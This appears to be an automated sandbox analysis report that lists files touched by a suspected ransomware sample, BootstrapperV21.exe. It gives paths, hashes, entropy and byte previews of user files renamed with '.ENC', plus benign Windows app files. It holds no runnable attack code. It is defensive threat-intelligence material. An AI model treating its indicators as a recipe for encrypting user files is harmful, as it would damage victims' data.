                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.../. .2h....I..Mq..&r....1Vj.dS.......m~..^....Y...O.L....xd..i.....<.6..e.K.y....<.aS..5.],...f..z.4"...........q...?.D.du2.C$,$.;.}...{....w......0..,....%z.U.Ah.u...5...J.B..2...i=...L"s....T..._..3......'....]$.;.8.$..[.;.......9[...\o....DA.(.nt..4....&..>5..G,....fD...>./.8..2...r..MV...E.......g.b.6z..5....Z=*.Ggg.....2..C.B.;.....jq.../t.42"V;.J......N....?..e.....|.m.VQ.j.>....!n..H.mr.A..N.J.{f.......}..v.L...S.K.~j./0h.T....).....<.n......Y.9.d.^..sMw....8..D..J..E04..d.Nn...v.Pfe......u{N..o.UD.f*...pk.6:....D..Y.L.....\..I.pb.sn.....d-.S..E+7<.

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):4.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:TZOJPq:TZmPq
                                                                                        MD5:680EE918CA143F24D117C15B46244A9C
                                                                                        SHA1:43E1D8847DEA402CB229967CFCBB636756FB9578
                                                                                        SHA-256:C5AFAF87C978DFA6E221A2A631CB31539C459CF657274D22F26A1CE8458FB012
                                                                                        SHA-512:B5FFEAAC23C6972C7E91F8D2CA80D44CAE70265EB1C1B0FF8DEBA1B852F2AC3FD473BD6F89626845975BC84E4959C5A169648E64ED6A33419A5F8824991B4579
                                                                                        Malicious:false
                                                                                        Preview:F....7.K..+..]O

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2832
                                                                                        Entropy (8bit):7.930203515158616
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:gCP6pgfwFoeFLCJ1EIGxZZnlq3SRCsLHWYNWg2SnkcCr7CKu+xXElISY9Bz1vNWg:D6pSOoesgF7lRCGHIgccHKu+lJP7+56J
                                                                                        MD5:43A72B4012ECFFFAA6273A11C27ED3BA
                                                                                        SHA1:6473CB56864C574C1E1E1E2726F52250282A5BE1
                                                                                        SHA-256:5DAE363D56F43E83560C64A10B9010939DD459E8F04E8ECC43F94B5FF3AFD862
                                                                                        SHA-512:CEB9EB64FD8302983D86C6FF9D28B4F32A6076CD1DF0035A4B9A7D5A039DF38F91AE2B90565CEA2301A17B60D48BE75B87599A74B57F1C940C62448BF58CB684
                                                                                        Malicious:false
                                                                                        Preview:K.1...nd.....$.....~.`........z...:.}...!,..!...aO.@L.I...*P..G..Nw.p.9..^.|s9.e.g.n.a9./...R.Nl.8..n..ScZ..2.l1.....I0..6=c%3..OQ..8@..'...'.....D:v):.."l.2S.[.=<.v.B^(R+q...R..k..).w...!>.hq.AQ.T'I./..~z\Ct#.^.._.H.'.D...w.;.......!...X.X[eb...)#...y.......e....B..Rl....tm`&....6.0...B[./......'....*....t..c..&E..v.p{........~...I-...s........O..3K...i.R....V..... ....j..VH.K.'|j..o1.d.;..^..U..Ll.......O.h.......b.j..J$..i..=yj....].Y^...~...'.`..Q"V.ry.%b`..^.......5B...u@e.^.T?..t.8...W9..8...?....Z..h.....p#.b..W~.a+...`".id..[z..rsiX..=b.f.p.%Z....Vm3.8....*0.a.8..].;Tv...9..>.......7...;-....>.R.I..J.....V..Aw...."..+...r.T...@.5../.._...u.Zx.4.a7..wO."...1.).$...c.d"r......"...@<..a.{.elN...7q....[...J..to_oei.n..g.d!.6)4.m....d...C.....N.-FY*.......#u...:D.#.....Y ......B.B...L..3.D+J.b.Z>......p. ...t..l(.3c=:.9...2..c..a2.U.R..H.Bb.8...Ng...:.y...lc.....}.J)..su,5;..a0.m=....$G.Y....g.t<q*A...b..tj.]..8.>......B...C.3....\

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):12304
                                                                                        Entropy (8bit):7.985283793346174
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:JjSs4b/GwWJgkyKYnWUePbdd5d/QYd3q0HGshbrHo4y6XwWBN5Avy2QrTG/:JjSJGjJ3GlePRd8Yd3/Xhbly6XT2x
                                                                                        MD5:476DB1F93F0CDAC620A872CFACDBEBBE
                                                                                        SHA1:63C93FDF66ACB289720B67B8104C98E0B89A66F5
                                                                                        SHA-256:6DBFC7F61D03BBF844E2CE226BB787068DB0C7BA4FCBABD70245950B0195C760
                                                                                        SHA-512:04CABC70ED1F87FD83EDFDFFABB9329FD524E81352A2CBB60F5DD4EAFDCE3DD25B0B25661FE39C278D1B9CB265530596076A72786EC76AC27AFBD4F244A9726C
                                                                                        Malicious:false
                                                                                        Preview:zi..o.v.C.{4..j@.|N.e.....4.A...!....m.`.N[M>..p.Gh...)..uuu)..GY..X....Cx..6B!|......p.........W2....e`W)..M..<.h..?..P4."...&.q.Y..]gM..R..#.~.....t....z7....u..[..@.........-.<.............$(...7.u......./........r.;..}...t....S..gjO.S.1..pk`.l...g.p..r`.as+L...*2..g.h.V.M.......pX. P..@N!..s.k.i..$.d.l:V...Q....z.%..L..CY@..Q.^......r..b.....q.-..O.k......\'.K.A...$a..$.F7.i.s%d.....'7.3..>y..^...x.......)@..A...90.'...IcN6U..~.5.....(f.7..4...@..!.n..\.X`zwl{^....U.p.....P..^...._ri.....5............1...V...a...NR....&....Ro/..k[..:7......];..X..F.\...%yN{....Q5K.B_..[.f./W%q.0.v..}....<."?..-......y..^.....t..x.<.r...n..{N.#{7O....y.kud'.?.....q.B.)..oX50/.1..3."....).d.;./m.?.K..x.yY...W......M..k..r.$T.].H......p...DF.]..<Hw...+.".U.(...jfN\1.i.&O...;..A.......a~[....\_...*Y..........s...!....u...!I..m.J.......3....K.......J......>...#UV.i.%...qRL.`.m.=B.#.2J...I.*..f...IQ...\z=...ZK.._....W(.....x."\!.D..B....!. .Z.q.Z...

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66736
                                                                                        Entropy (8bit):7.997056495580313
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:Fy09dPjj3wM4wbNTdk6HExHbG4km1jThXa06xQsWqo6IRW:8QjA5Gdk6HsyY1jNaDuW0RW
                                                                                        MD5:B4936B31CB0BAA8B2CEE617EE7B7A3DD
                                                                                        SHA1:7B49F387B581300D8FFF8A754B1AF8095D3D53CC
                                                                                        SHA-256:AF1683CCC55D7EB9C234402C116B8F600B7C29AA5D4E2367085FC553AD2CC9FA
                                                                                        SHA-512:6B6CB8A2AD879082C3B8A8721A96094DD7120CA2B5CB68417D79A0C459BABD31C921369D1956D845257D1839C14185DD55D18089A05F0F91D501A397C91A3813
                                                                                        Malicious:false
                                                                                        Preview:.Ij[.u..Hyq.6.u.u.Q#....w....N8N}..mE.?.%..u./..^.Pe..u...a.t#...............G..D....P:p-.B.r......}fu!....Ay2.Y{.5H.....N.....r3h)..||.\C....2y.g......T:.mw....Q....&',....c.Gyks.R.W.1.%..Q3.Z}Y#.|W&*S......6D..@#..../..d.....['..*I...O.G..yx.9....R........P<.....7.R...^.C.B.=..N.>...?...M..^.V.....3s"....m P.B..J......p....%.@......2p..tg....ZyF.?.j..l.....@.O,o.[a..(c....D.B%.;%..N%...#.z~hXy..)....).)....zU.Sa..L..=LD:5..Z`#.D1:..e+."t.C..{..p.O|<./.`i%.6(Hv/.%BHW.S....@.}.JM..A....A.$..ak.}.....u6....IK.|.$e?...n....\h.C~...........),f.!p..d...Z.B....T.u.y.N.Y-...;..)].".K(....^.Ub\B[.f.H..)i...e.u.[~..l...Q.Cot........E.7%....zK.'/......Y....'.X...*g..\.$..|[..p.2.qv.Q..CJ..Z..1......5.....-iK..z..B.$k..K.fyu...8...v...._+H.....m..V..........xx.s.r.q.e.p.W......}.|..]ZW?.q:..{....x..4....N.Y..Z.(S..=..._....&M.... x...e.V..d.{........Up..|.............=hI .........}c(.0..{[..e&...,.kTh..8..|..@t*.......Ey..pR%2..vp...

                                                                                        C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):608
                                                                                        Entropy (8bit):7.721309680559295
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:5kUNGSfGaVgb+M0cM3zyQYxEL82uqCY7mp11VJPE0i:2+GSeaVgi73iELLuD19sL
                                                                                        MD5:5F1EF56FAE8F36D105AB033609E795AE
                                                                                        SHA1:48ECEEFFB914905A3078384AE9B0E5A3935542F8
                                                                                        SHA-256:91C48A0BD0A635735754086047E861CDE776462881C440BA65AE895A17FD6702
                                                                                        SHA-512:91200C52BA07B2AE34225CD74F62ED4E0F993AA26022521D723716639B5C93F0DA392E9531CE5086B8731636F75672037194C2B01937B28DCC4458475295F17E
                                                                                        Malicious:false
                                                                                        Preview:NP..@CO.0..=.........F...t.^J...................%Go.ab.4."r:d....8..=..w................73.....O.`+:'.[qe.n*.S....b.$l..J.c.\..?..5..r-.[...c..C....1.~..Uq.=..l3......[..P.....J:w%..@....p..wE..-<...-..%.?.....tKs....z...<'||0.....*......q.Qs..e..W.py...{...T.U2....*\1.g..h.Y..8.C..._y..i.}~.e.M..Kr..<..D..ia..A.(.!~..&dJ.....2..)S....^..5.b..\M.U6.>S..+..&C]..75.y..T.......|.>...../....%V.s.%.....+..nq..cR.a^.m...r..l!._....VO!dZ.8./l.....2SC.|E..........zK/w..k..j/...# B%.C....F....~..h.....s...Z.T...64.`R.._^..9.@.ou.....-.. ...9......"*..V..y.......5....{.7..f.

                                                                                        C:\Users\user\AppData\Local\IconCache.db.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):10688
                                                                                        Entropy (8bit):7.982078234697045
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:2giK8kldgfe+5rBZQfgwkr+ArpT+AKjAKFuiywWFImAgjFKd+u8PPT:vi+lcBOfZArhytywu7jFPT
                                                                                        MD5:568315B8707F024A45AE3A2AFC8B2492
                                                                                        SHA1:3FD7CC21730CCD025E0BA062D2A67D5C04A28CFB
                                                                                        SHA-256:B2B1AB3540FB78F7D2977F4592CA347CD85D6134D7A63BBE630AB48AAE5B2FEF
                                                                                        SHA-512:F319FA2C182061A4362D05EBA425500B33D9BAD7836B750AE5F5B004C9CDEE5AAAFAB73412803D0737324480A27A8FEC30E56D71F554A3485A0732B03CB496AD
                                                                                        Malicious:false
                                                                                        Preview:{...'S.]gx.....m...*6P.-....O.=....P.S<'%.g....X...B=.....K/vB. n5..s...J.....y.T..'5]...XT.UO.e*.........3..m.(...fMF.d.r...P"...M..0.........{.t..c..+.1....(v..@..:.9........%.D.B.A...,.t.L.......g=Cb..K)...%..&..E.CZGb5N.uPHT_.)...#..3./....*r.K...4~...|..;.&frA...q.G...F....U,.^.(.].....T_FvBd>*.J...\3..!-..K..C.<k...{....C..2.....E.R/3..}'.!]..8.....H......sJ.O<(m.......m.Hv.}..ff.Vp..g.E...ZY.MP...RB.P.<G.}......].e....>K]S`..5...FZj....p.<&K.&.~*d.L..o.Y..r.....R.Z..e..'E...tK.~%.....fD.....t..../3../~S.Xb..Q[V]z...K..r.......[...1P...G.......~0Jt..=:.`M.%.*.i.4.&...3..b119...:..........V.....f.04......Z........w(..Cd..I{...T.`5..R4.5.x.....G....)54.5..E..3..^.f<.QH..Z.....M=.i.0.F{...n..o...k.N..54...C...x...(....;T\....".....U).)......*.Di..#..y..y|..O.. l...;`|.r...J*..rb...:...I.N...|e.p..l.E......s.PkJ%_.a.9..#zn........9..8!.2.S.F.5.H)..g.....-.....4..9.JyIP.;D....O.j_...i..H..`hl...Oc......X....l.H...../.._mC..S+Z.

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bootstrapper.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        File Type:CSV text
                                                                                        Category:modified
                                                                                        Size (bytes):1499
                                                                                        Entropy (8bit):5.341844552740347
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNWE4KXSE4KlOU4mXE4Ke60:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKl
                                                                                        MD5:D45F0B0387AA9450CC88125F2428C26D
                                                                                        SHA1:8C77259A299BF2FB7A66EC695A3F0EFA5154DCB6
                                                                                        SHA-256:6A6DF19288C76B1CEDD0F507F226705CDE6A69F3AB59B4FC13AF5C7B7F7D12A3
                                                                                        SHA-512:5523AD8087ECE039FFFEF746F9B6175D6C2F2523C372FC813D21E695C18D986432D2B83C23D0E6CD6C42C97DFC8DECE3121BE8907D05337EA9B282D3E947EF4F
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):654
                                                                                        Entropy (8bit):5.380476433908377
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):144
                                                                                        Entropy (8bit):6.662844793048896
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YIjhUb9va7HYHepa0s31JRn1k0BN74O+mFZZBLvVbg8QGXI:YSSxY4WS1fni0B9n3FZvLNE8QGXI
                                                                                        MD5:BC49EB48F6C2D269AB6BCE1684AAAEA3
                                                                                        SHA1:F6340791563EBD4FF9D800E13F7A61090D16EE1A
                                                                                        SHA-256:77E84F901BA6F9A1EC8B196F7E9DE01AE49FF11BFC7DDB87E649FCCAF2679D92
                                                                                        SHA-512:2EB2D371F10F128402FB8AF089FE8EDBC5144E35238FDEC556C5624E04AF69619BAC9EAB7946070E8E16721FBC782A2D580323C92FA14B429978C6B3B71F3D77
                                                                                        Malicious:false
                                                                                        Preview:.W..b...S.....~..H...:..6hp.E..f?m"...."j..... ,n.J.v..6Q..dn0...tx.M..YJt.zIp.2Q.8...C...A.-...e.u...I..O.(a..}.v..Bc_f3.0.E.-.e...c+.B.W~

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\INetCache\8FGZXQXH\configuration[1].xml

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):2659
                                                                                        Entropy (8bit):4.926959150875136
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cK88z2Dxfo++T4Vu5Hj2oJ//QBfM9ifr9jf2dBfUyrAf0dPfUytCfN4wc/+:n88z2DxueBQipjQB8BWP8pc+
                                                                                        MD5:69415BBB2113097CE28402C78AAB8A1D
                                                                                        SHA1:3CC52AA27D635F22434CFEAD93C27D3B5287BF2E
                                                                                        SHA-256:95458051B4940AA84E142A19F4F775901CBFADC6BDEC409FC7C9DAC854FC8910
                                                                                        SHA-512:03C62FF862F73046C45D6495D6E5E821ACBD228A230E6761DEE9E8A4E48F157CE3566E6E06FE8CACA73D4736B6AC78A4914855CDE4037574D8DBF86B2B2A0B54
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1">.. <targetedClient>XblWinClient</targetedClient > .. <rights>Copyright (c) Microsoft Corporation. All rights reserved.</rights> .... <configuration name="Features">.. <property name="EditorialPlaylistsEnabled" type="string" value="AU,CA,DE,FR,GB,MX,NZ,US" />.. <property name="ExploreWithGenreDetailsEnabled" type="string" value="AU,CA,DE,FR,GB,MX,NZ,US" />.. <property name="GenreRadioEnabled" type="string" value="AU,CA,DE,FR,GB,MX,NZ,US" />.. <property name="MusicPassUpsell" type="string" value="" />.. <property name="MusicPassUpsellForCollectionPDP" type="string" value="" />.. <property name="MusicPassUpsellInMixtapes" type="string" value="" />.. <property name="MusicPassInAppPurchase" type="string" value="" />.. <property name="MusicSubscription" type="stri

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x30cb0b1b, page size 8192, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):3670016
                                                                                        Entropy (8bit):0.2609757188029013
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:iSh2I+KY8kmfnbsgTC0/k63bBu7fhWxvM6oSh2/KY8kM5yDFqfEsWgTC0/k63bBR:i64Lgm6o6MLa
                                                                                        MD5:516248A43EBE07947F3BEE68651B4873
                                                                                        SHA1:79330376B0202CC550536075BC85E6CB5A4C3868
                                                                                        SHA-256:2CD0BDEAB1FB6734FCCC71E9543F5B3B0D552000460AF1B5413504BC4273D68D
                                                                                        SHA-512:AE477A612090C606D492BC4944A55970C9420DB953B71B612F92F14AEA5A01109B964C849772EB10C4653FACADCBC48165ECBE92EC131414F1D8CA2D2E7A6F9F
                                                                                        Malicious:false
                                                                                        Preview:0...... .......-................|...........................................|S.h...........................E........|..........................................................................................................eJ........... ...................................................................................................... ............|...................................................................................................................................................................................................}..........................................}...........................|g.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):0.620601861326854
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q8/6UIPxJ1S6UIPxJ1+QelRc8/6UIPxJ1S6UIPxJ1+QelR:p/6UCx/S6UCx/+L/6UCx/S6UCx/+
                                                                                        MD5:09AAD91810326F8A01CC56FBC2CEC805
                                                                                        SHA1:42AB3636F72646BFE9C2CB9788EC78EA4C3D16CB
                                                                                        SHA-256:480301694828650C8103E4679E43DA0ECB15B8E5193630819E71391BA9A33353
                                                                                        SHA-512:D6C285137CFCD98D4D31D6C1B96BAE5B5494A77AD836904D2CF1B077A6FBD8110C6CC8C0B9998F8EFB3313365711F1AD726805658BB1E9879BCF5E83B9F7FFA2
                                                                                        Malicious:false
                                                                                        Preview:Q.?.................E........|..................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\..............................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\...............................................................................................................................................................0u..,.....................5w.................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2097152
                                                                                        Entropy (8bit):0.7010310217466243
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:ftMlR1dPEBmHlDDul/uSsa+ciyEzWyeTq5BiN+A0fO4m5idQ15N8AZ5yeh0G32f6:ftMlRbDhvOfVXR2sEtqts
                                                                                        MD5:0CD426F93060956CC817BCE5A3813C11
                                                                                        SHA1:A09F3C6B03057833B31C0B7219C82EFDAEFC3942
                                                                                        SHA-256:2C5F0D01545273B27E1EE617FAA4AA298370A7CA8C5613BDA28DBF6FA93DA9BD
                                                                                        SHA-512:B2545307D37441B823D4D700F64A8EC823B5B9710FF80B821B8A332B6318A9CFD5AEB98BDF7ECC53D2CAC4B300116AFF4C7EB600C8D1B4CDBC3B2B0E0E37EA3F
                                                                                        Malicious:false
                                                                                        Preview:.[............. .....|......................E........|..................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\..............................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\...............................................................................................................................................................0u..,.....................5w.......................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2097152
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                        SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                        SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                        SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                        Malicious:false
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2097152
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                        SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                        SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                        SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                        Malicious:false
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):42521
                                                                                        Entropy (8bit):5.29152498657952
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:eGtIAxlKa5Q3t6MpDoWTLSFHjoKfyulblZax:eGtIAxlKa5Q3t6MpDoWTLSFHjoKfyulK
                                                                                        MD5:97F35D0E196FC2BF01B683E7FC818421
                                                                                        SHA1:9F3E3B37F0F30D6F9BC4DF5FAA7020F8FF2968FA
                                                                                        SHA-256:607E3A0BDA77F2B72E09F946C632EE3CCBB12874C595BF3D6C27F96B58F7B069
                                                                                        SHA-512:9A313DBF26C15097CAF17F3F41FE12511861B115BE60070BAEAC725E38D84A5EE6F9B993416BD0A8238EC0394B9B111E11EAC5B7DCD3547D7A2C716D60CF21A8
                                                                                        Malicious:false
